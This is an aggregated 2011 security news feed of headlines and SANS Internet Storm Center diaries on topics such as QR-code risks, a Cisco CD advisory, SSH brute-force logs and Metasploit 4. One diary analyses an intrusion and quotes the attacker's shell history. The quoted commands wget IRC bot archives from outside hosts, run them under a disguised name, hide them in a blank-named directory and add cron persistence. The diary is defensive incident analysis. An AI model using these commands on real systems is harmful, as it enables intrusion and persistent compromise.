InfoSec News

Noted researcher Dan Kaminsky presented his latest network security research topics, including vulnerabilities in P2P networks, UPNP and home routers.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
Microsoft sidesteps bug bounty with its own reward program, offering a cash prize for developing computer security protection technology.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
Former CIA ops director Cofer Black urges the security community to educate decision makers and validate how cyberattacks endanger national defense.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
McAfee says Operation Shady RAT, a five-year research effort involving 72 compromised organizations, exposes key national cybersecurity lapses.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
Security product provider Rapid7 has updated its widely used open-source Metasploit exploitation framework, expanding the software so it supports enterprise IT security staff as well as its core audience of penetration testers.
 
Intel is opening up two research centers at Carnegie Mellon university that will develop technology around delivery of real-time information to consumer electronics aggregated from millions of cloud sources, the company said on Wednesday.
 
WiMax mobile operator Clearwire plans to add equipment to its network that can use LTE-Advanced, the next generation of LTE technology, the company announced Wednesday.
 
When hackers broke into Google's computer network nearly two years ago, their first step was to take over Microsoft Windows machines running in the company's China offices. Would Google have been better off had those workers been running the Mac?
 
The ACLU has asked law enforcement agencies in 31 states to detail how they are using mobile phone location data.
 
Google chief legal officer David Drummond Wednesday issued a stinging rebuke of what he called 'bogus patent' attacks on the Android operating system by major competitors like Apple, Oracle and Microsoft.
 
Microsoft today launched a $250,000 contest for researchers who develop defensive security technologies that deal with entire classes of exploits.
 
Cofer Black warns that government officials shouldn't dismiss warnings of imminent cyberattacks.
 
A $66.6 million Oracle ERP project undertaken by Pennsylvania's Liquor Control Board has been marred by inflated costs, staffing woes and operational problems, according to the state's auditor general.
 
Vonage Wednesday released an iPhone app that offers some benefits over Skype's competitive voice-over-IP calling service.
 
A report issued last week that claimed users of Microsoft's Internet Explorer have lower IQs than those who run rival browsers was a hoax.
 
Verizon Communications will appeal a $115 million verdict in a patent-infringement lawsuit brought by cloud-based TV infrastructure vendor ActiveVideo.
 
Samsung on Wednesday announced a software update for its Tab 10.1 tablet with a gaggle of business features, which could help the company push the device to corporate users.
 
Rodrigo Branco talks about vulnerabilities, malware sophistication and whether the move to cloud-based services will change the way cybercriminals work.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
Android devices are now more than twice as likely to be hit with malware, thanks to new techniques exploiting numerous Android security issues.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
LogRhythm Labs explains their new rules for the vendor’s SIM appliances.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
WordPress Timthumb Plugin 'timthumb' Cache Directory Arbitrary File Upload Vulnerability
 
AT&T and Sprint Wednesday separately announced plans to sell new BlackBerry smartphones are slated to hit the market by year's end.
 
Sermo, the largest online physician community in the U.S. with about 130,000 members, has launched an app that allows doctors to submit cases for near real-time peer review and feedback.
 
Two U.S. agencies announce charges against 72 alleged members of a child pornography bulletin board.
 
I just wrote a quick note about the Cisco warranty CD mixup. While writing that, it came to me that currently quite a few of our readers may be visiting Las Vegas for this summers security drink fest. Historically, this has been a time to play various pranks on the audience of these conferences. In the past, fake ATMs, odd wifi networks, weird BGP issues and other tricks were mentioned.
One thing to look out for this year may be QR codes. 25% of internet users are now apparently using mobile devices. Many of them have known vulnerabilities the owner didn't bother to patch yet. At Vegas this week, you may prefer using your mobile device via 3G networks to avoid the notoriously unsafe Wifi networks offered at these conferences.
But there is one problem with mobile devices:The keyboard typically stinks. In particular on cell phones. To help you with that, we have QR codes. QR codes are bar codes that encode text and are commonly understood by mobile devices. Take a picture of it, and an app will take you to the encoded URL. Sadly, most people are not all that good in encoding barcode, and have no idea what they are entering. Compare it to handing your phone to a friend and telling them to type for you.
These barcodes can link directly to browser exploits, or could include other malicious content to manipulate your phone. If you spot a malicious code, let us know ... most of the applications will tell you what URLthey are going to open up before they actually load it (similar to some of the short code URLs).


------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Cisco released a somewhat unusual advisory today [1]. instead of talking about a vulnerability in a Cisco product, the advisory warns of a CD shipped by Cisco between December 2010 and August 2011 (= now..).
The CD itself does not include any malware, but documents on the CD, if opened in a browser, may include content from known malicious sites and could have lead to exploitation of the user.
According to Cisco, the site in question is down for some time, and they are not aware of Cisco customers being affected by content from the malicious site. But with all the talk about malicious USB sticks and people focusing counter measures on preventing the use of unauthorized USB sticks, CDs/DVDs certainly should be considered too.
If you are in Vegas this week for Blackhat/Defcosn:Be on the lookup for certified pre-pw0n3d vendor software distributed on USB sticks or CDs. (or QR codes? maybe I should do a diary about that)
[1] http://www.cisco.com/warp/public/707/cisco-sr-20110803-cd.shtml
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
In what may be a preview of what will happen in the United States, the Australian telecommunications giant Telstra late last month released its plan to bring a close to the old telephone world. Telstra announced it will decommission its copper customer access network and stop offering fixed line telephone service to retail customers after July 1, 2018.
 
Hacker groups such as Anonymous and Lulz Security may need to be monitored more closely in the event they are assisted by other hackers with higher skill levels and decide to strike critical infrastructure.
 
Thanks to Pat for pointing out a sharp increase in the number of sources scanning for port 3389 [1].
Port 3389 / TCP is used by Microsoft Terminal Services, and has been a continuing target of attacks. If you have any logs you want to share, please submit them via our contact page . In particular if you observed anything different the last couple days.

[1] https://isc.sans.edu/port.html?port=3389
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Security vendor McAfee published a detailed report on Tuesday about a hacking group that penetrated 72 companies and organizations in 14 countries since 2006 in a massive operation that stole national secrets, business plans and other sensitive information.
 
Before the Internet, passwords played only a tiny role in everyday life. Think about it: Except for your ATM PIN, what important codes did you need to remember? Probably none. But now, you can’t click a link without hitting another site that requires a password. Doesn’t matter if it’s a big-name destination like Google Docs or Mint.com, or a smaller, more private site such as your local library or company intranet. You want in? Password, please.
 
There's a lot to love about Gmail, but its built-in task manager is pretty weak. In fact, it's little more than a glorified checklist.
 
Maxthon (free) is probably the best Web browser you've never heard of. I reviewed it favorably in the past, when it resembled a cousin of Internet Explorer 7. Since then, it's changed drastically. Maxthon includes two built-in rendering engines, Webkit and Trident, and you can switch between them with a click,which means no website should be incompatible when browsing. One of the best uses for this is to visit ancient sites (like for work) that only work with Internet Explorer.
 
phPhotoGallery Login field SQL Injection Vulnerability
 
Ataccan E-ticaret Scripti 'id' Parameter SQL Injection Vulnerability
 
BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting Vulnerability
 
NC LinkList 'searchstring' Parameter Cross Site Scripting Vulnerability
 
mt LinkDatenbank 'b' Parameter Cross Site Scripting Vulnerability
 
An explosion in mobile malware during the last six months has more than doubled the chance that a user's Android smartphone will become infected, a security researcher said today.
 
A Japanese city is the first in the country to replace its public website with a Facebook page, as officials stressed the open nature of the social network as their main motivation.
 
Apple's latest ultraportable brings spectacular responsiveness and superior mobility to heavier workloads. Paul Venezia compares the new MacBook Air to the Pro.
 
Industry observers say that a stagnant laptop market could be reinvigorated by the energy-efficient ARM chips that power today's tablets. What do you think? Will ARM chips provide a shot in the arm to laptop sales, or has the post-PC era already arrived?
 
Security vendor McAfee published a detailed report on Tuesday about a hacking group that penetrated 72 companies and organizations in 14 countries since 2006 in a massive operation that stole national secrets, business plans and other sensitive information.
 
Facebook has acquired Push Pop Press, a start-up that has developed software for creating highly interactive digital books, for an undisclosed amount.
 
Game mechanics can help change the behavior of both employees and customers in beneficial ways. Just make sure to manage the risks effectively.
 

Posted by InfoSec News on Aug 03

http://news.cnet.com/8301-27080_3-20087201-245/researchers-warn-of-scada-equipment-discoverable-via-google/

By Elinor Mills
InSecurity Complex
August 2, 2011

LAS VEGAS -- Not only are SCADA systems used to run power plants and other
critical infrastructure lacking many security precautions to keep hackers out,
operators sometimes practically advertise their wares on Google search,
according to a demo today during a Black Hat conference...
 

Posted by InfoSec News on Aug 03

http://www.eweek.com/c/a/Security/Pwnie-Awards-in-2011-Include-Sony-Anonymous-LulzSec-WikiLeaks-113818/

By Fahmida Y. Rashid
eWEEK.com
2011-08-02

The nominations for the 2011 Pwnie Awards at Black Hat recognizes Sony
for its sheer incompetence at security, and Anonymous, LulzSec and
WikiLeaks for cyber-mayhem.

Security professionals heading to Black Hat can look forward to the
Pwnie Awards, the hacker version of the Academy Awards, this...
 

Posted by InfoSec News on Aug 03

http://www.washingtonpost.com/politics/nsa-is-looking-for-a-few-good-hackers/2011/08/02/gIQAXZAbqI_story.html

By Tabassum Zakaria
The Washington Post
August 2, 7:34 PM

The National Security Agency has a challenge for hackers who think
they’re hot stuff: Prove it by working on the "hardest problems on
Earth."

Computer hacker skills are in great demand in the U.S. government to
fight the cyberwars that pose a growing national...
 

Posted by InfoSec News on Aug 03

http://blogs.forbes.com/seanlawson/2011/08/01/dods-first-cyber-strategy-is-neither-first-nor-a-strategy/

By Sean Lawson
Net Assessment
Forbes.com
August 1, 2011

The Department of Defense has released its long-awaited "Department of
Defense Strategy for Operating in Cyberspace" [PDF], as well as a
website devoted to selling that strategy. The strategy has faced no
shortage of criticism over the last couple weeks, from VCJS Gen....
 

Posted by InfoSec News on Aug 03

http://www.smdailyjournal.com/article_preview.php?id=164202

By Michelle Durand
Daily Journal Staff
August 02, 2011

Documents containing personal information of approximately 1,500
Mills-Peninsula Health Services patients were removed from the facility
over the course of a year and taken home by a mailroom employee,
according to a hospital spokeswoman.

The worker, who has since been terminated, took the documents between
November 2009 and...
 
Joomla! 'com_astra' Component 'F' Parameter SQL Injection Vulnerability
 
./run
We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there aren't any traces in the shell history file that would tell us either way.
In any case .. follows Phase #3a: The attacker installs some goodies. virus.tar isn't really a virus, it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file, which tells us that he isn't all that experienced on Unix. A real Unix hacker would most likely use vi, because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot Evolution when he starts it, likely hoping that an admin would overlook it in a casual investigation.
/sbin/ifconfig -a | grep inet

wget http://f......com/storm12/virus.tar

tar xvf virus.tar

rm -rf virus.tar

cd virus

ls -a

nano start

nano inst

chmod +x *

./autorun

./start Evolution
Phase#3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called (single space). If you want to search for such directories on your system, try this

#find / -name
mkdir

cd

ls -a

wget http://c.......org/egg.tgz

cd

tar zxvf egg.tgz

rm -rf egg.tgz

cd .access.log

ls -a

chmod +x *

./eggdrop -m bot1.conf

ls -a

cd scripts

nano respond.tcl

pwd


Phase #4: The attacker wants to make sure that access can be re-gained, and configures the cron tab to re-start some of his processes automatically on a schedule.
crontab -l

crontab -e

exit


(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
We received an email from a reader today about a link on his wife's Facebook wall. The link indicated that a friend had tagged her. When he tried to remove the post from her wall it would not allow removal.He reported it as spam. Apparently a friend of hers clicked on the link and got infected. The link point to bitlyDOTcom and have random file names. Let this serve as a reminder to everyone not to click on links until you have checked out the source. As for Bitly - I would use extreme caution with any links identified as source bitlyDOTcom.This is a website redirector that allows the link to be shortened, shared and tracked. Even if you don't get malicious programs installed, do you really want to be tracked????
Thanks to our reader Paul for the email reminder and information.
Deb Hale (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
On Friday an article appeared on techdirt.com claiming that Pakistan is trying to ban encryption under their new Telco law.

In the article the author suggests that encryption is really just a form of speech and that trying to ban encryption is

like trying to ban language.



I find the banning of encryption interesting in light of the number of United States compliance standards and laws governing

the use of encryption to protect financial data (PCI) and medical records (HIPPA) among them. These laws require that the

data be protected in place and in transit. Does the proposed Telco Law in Pakistan mean that the US will not be able to

exchange data with them? How will laws like this effect world trade?



All of the work that has been done to establish world economy could come crashing down if laws like this stand. It will be

interesting to see how this develops. Many businesses today operate in the Internet, many are moving to the cloud. These businesses and organizations need to protect their data to protect their financial stability. So in this Handler's opinion, ban encryption will never happen. Others may not agree with me. Let me hear from you. Can we or should we ban encryption?


www.techdirt.com/articles/20110729/03142715310/reports-claim-that-pakistan-is-trying-to-ban-encryption-under-telco-law.shtml

Deb Hale (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
When Lion first appeared in the Apple App store most of probably blindly click YESYES YESlike good little Apple zombies (me included!)... After some updates and fiddling withApplications to get them working I started to take a hard look at what was now leaving my devices. A new series of packets on port TCP 5223 was leaving outbound from my network stack and thanks to Little Snitch [1] I was in control of it.

On Apple's support site [2] You will find a list of well know TCP/UDPports used by Apple operating systems and according to their site:



5223
TCP
XMPP over SSL, Apple Push Notification Service
-

MobileMe (Automatic sync notifications) (see note 9), APNs, FaceTime, Game Center




Check out my first Video Diary of taking a look at these packets.


Richard Porter
--- ISC Handler on Duty

[1] http://www.obdev.at/products/littlesnitch/index.html
[2] http://support.apple.com/kb/ts1629 (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Chris Mohan

--- Internet Storm Center Handler on Duty (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu SEC 503 coming to Ottawa Sep 2011 (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
We all know that web applications are the new firewall. However, so far we had a hard time collecting web application logs. The hard part is to balance ease of install of a sensor (without disrupting the web application), fidelity of the log information and privacy.
With firewall logs, it is pretty simple. A rejected packet in a firewall has very little information and privacy isn't a big issue. Web application are different as the actual meat of the log event is in the request content, which may contain personal information. Parsing web logs isn't so easy either. Administrators frequently customize log formats for special purposes.
To balance these different issues we decided to focus on errors, but instead of parsing logs, we set up a little php script that you can add to your error page. In its current form, the script will work with PHPweb servers (tested with Apache) that support the curl extension. Curl is installed by default in current versions of PHP.
Now all you need is an error page. In Apache, just use the ErrorDocument configuration directive. For example:

ErrorDocument 404 /error.html

Will redirect users to /error.html in case of a 404 error [1]. You may already have a page like that configured. All you need to do is add the php snippet to the end, sending us the intended URL, the user agent and the IPaddress of the client access the missing page.
The hope is to collect data from automated probes, similar in how DShield's firewall logs reflect portscan activity.
In particular if you are running a personal / home web server:Please consider adding the collector script.
Once we get a few submitters, we will start adding continuously updated reports to the site, just like we do for the DShield data. However, we can't do this until we have at least a dozen submitters (better 100 or more) . We can not publish one off errors as they will likely be specific to your site and again could cause privacy issues.
Why do we only support PHP? Well, that's the language I know. Feel free to submit a .Net/Java/Ruby/Perl or whatever version of the script.
Simple steps to sign up:

Login to retrieve your authentication key here https://isc.sans.edu/myinfo.html
Download the php snippet here https://isc.sans.edu/tools/404project.html
paste it into your Error Document
test...

Please contact us if you have any questions.
[1] http://httpd.apache.org/docs/2.0/mod/core.html#errordocument
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Citrix has identified a vulnerability in the XenApp and XenDesktop which could potentially be exploited by sending a well crafted packet to the XML vulnerable component. The code will run with the privileges of the service.
Citrix has posted a list of versions vulnerable to this issue with the hotfixes available here.
[1] http://support.citrix.com/article/CTX129430


-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
A little while ago I asked for some SSH logs and as per usual people responded with gusto. So first of all thanks to all of those that provided logs, it was very much appreciated. Looking through the data it does look like everything is pretty much the same as usual. Get a userid, guess with password1, password2, password3, etc.



One variation did show. One of the log files showed that instead of the password changing the userid was changed. So pick a password and try it with userid1, userid2, userid3, etc, then pick password2 and rinse lather and repeat. Some of the other log files may have showed the same, but not all log files had userid and passwords available.



A number of the IP addresses showed that they were using the same password list, indicating that either they were being generated by the same tool or might be part of the same bot net. Quite a few IP addresses showed up in different logs submitted.



The most common userids were, not unexpectedly, root, admin, administrator, mysql, oracle, nagios. A few more specific userids do creep in, but most are the standard ones.



So not earth shattering or even mildly surprising, but sometimes it is good to know that things haven't changed, much.



As for the attacking IPs. You can find the unique IPaddresses performing SSHattacks here http://www.shearwater.com.au/uploads/files/MH/SSH_attacking_IPs.txt
A number of the logs were provided by the kippo SSH honeypot, which looks like it is well worth running if you want to collect your own info.
Thanks again and if Imanage to dig out anything further I'll keep you up to date.
Mark (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
One of my favourite tools has to be Metasploit and version 4 has been released and is available for download.
Updating an existing instance is a cinch, just run the msfupdate or SVNand you should be good to go. Alternatively you can get fresh install files from the metasploit web site. More info here -- https://community.rapid7.com/community/metasploit/blog/2011/08/01/metasploit-40-released?utm_source=feedburnerutm_medium=feedutm_campaign=Feed%3A+metasploit%2Fblog+%28Metasploit+Blog%29
Enjoy.

Mark (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Posted by InfoSec News on Aug 03

http://www.informationweek.com/news/security/attacks/231300047

By Mathew J. Schwartz
InformationWeek
August 02, 2011

Over the past year, the median cost of cybercrime increased by 56%, and
now costs companies an average of $6 million per year.

That finding comes from Ponemon Institute, which on Tuesday released its
Second Annual Cost of Cyber Crime Study, sponsored by HP ArcSight. For
the study, Ponemon questioned 50 U.S.-based businesses,...
 
Internet Storm Center Infocon Status